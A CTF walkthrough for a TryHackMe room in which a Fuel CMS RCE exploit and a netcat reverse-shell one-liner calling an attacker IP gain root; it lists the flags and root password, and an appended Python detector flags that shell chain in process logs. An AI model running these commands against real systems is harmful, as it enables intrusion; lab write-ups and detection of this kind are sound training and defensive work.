Walkthrough : Priv Ctf22
Secuneus Room : TryHackme
Join Room : https://tryhackme.com/jr/secuneusctf
1. First, we scan the IP address with Nmap, which tells us that port 80 is open.
2. Then we visit the website running on that IP address; it is a site named Fuel CMS.
3. So we search for information about Fuel CMS.
4. After searching, we find that Fuel CMS is vulnerable to remote code execution using a Python file, 47138.py, which is available on Linux.
5. Then we edit the file, changing the IP address in it to our target IP.
6. After editing the file, we run it with the command "python2.7 47138.py". It will not run in Python 3.
7. It gives us a command prompt (CMD) on the application.
8. Then we use netcat to get shell access.
9. We use the netcat reverse shell command line from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.47.96 4444 >/tmp/
╰─$ nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.47.96.
Ncat: Connection from 10.10.47.96:47538.
/bin/sh: 0: can't access tty; job control turned off
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ /usr/bin/script -qc /bin/shell /dev/null
10. This gives us shell access.
11. Now we search for the first flag as the normal user.
12. Under the normal user there is a directory named root, which contains the file flag.txt holding the first flag: 6470e394cbf6dab6a91682cc8585059b
13. After this, we have to install the database, as written on the website.
14. After installing the database, we find the root password, which is mememe.
15. Then we become the root user and search for the root.txt file, which contains the second flag: b9bbcb33e11b80be759c4e844862482d.
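From the defender's side, the shell chain in steps 8 to 10 (a named pipe, an interactive /bin/sh, netcat to a remote address, then script for a TTY, all as www-data) is easy to flag in process-execution logs. The following is an added example, not part of the original walkthrough; the one-line record format, the timestamps and the account list are assumptions made for illustration.

```python
import re

# Service accounts that run web applications; www-data is the one seen in the walkthrough.
WEB_ACCOUNTS = {"www-data", "apache", "nginx"}

# Command-line traits of the shell chain in steps 8-10.
INDICATORS = {
    "named_pipe": re.compile(r"\bmkfifo\s+/tmp/\S+"),
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
    "netcat_outbound": re.compile(r"\bn(?:c|cat)\s+(?:-\S+\s+)*\d{1,3}(?:\.\d{1,3}){3}\s+\d+"),
    "pty_upgrade": re.compile(r"\bscript\s+-qc\b"),
}

# Hypothetical one-line process-execution record: "<ts> user=<u> parent=<p> cmd=<command line>"
RECORD = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")

def parse(line):
    """Return the record fields as a dict, or None for a line in another format."""
    m = RECORD.match(line.strip())
    return m.groupdict() if m else None

def detect(lines):
    """Flag commands run by web service accounts that match any indicator."""
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None or rec["user"] not in WEB_ACCOUNTS:
            continue
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(rec["cmd"]))
        if hits:
            # Two or more traits in one command line is the full reverse-shell pattern.
            severity = "high" if len(hits) >= 2 else "medium"
            alerts.append({"ts": rec["ts"], "parent": rec["parent"],
                           "severity": severity, "indicators": hits})
    return alerts

# Constructed sample records; the two flagged commands are copied from the walkthrough.
SAMPLE_LOG = [
    "2022-01-01T10:00:01Z user=www-data parent=apache2 cmd=php /var/www/html/index.php",
    "2022-01-01T10:02:14Z user=www-data parent=sh cmd=rm /tmp/f ; mkfifo /tmp/f ; "
    "cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.47.96 4444 >/tmp/",
    "2022-01-01T10:02:40Z user=www-data parent=sh cmd=/usr/bin/script -qc /bin/shell /dev/null",
    "2022-01-01T10:05:00Z user=admin parent=bash cmd=nc -lvnp 4444",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

In a real deployment the records would come from whatever process auditing the host already has, with parse() adapted to that format.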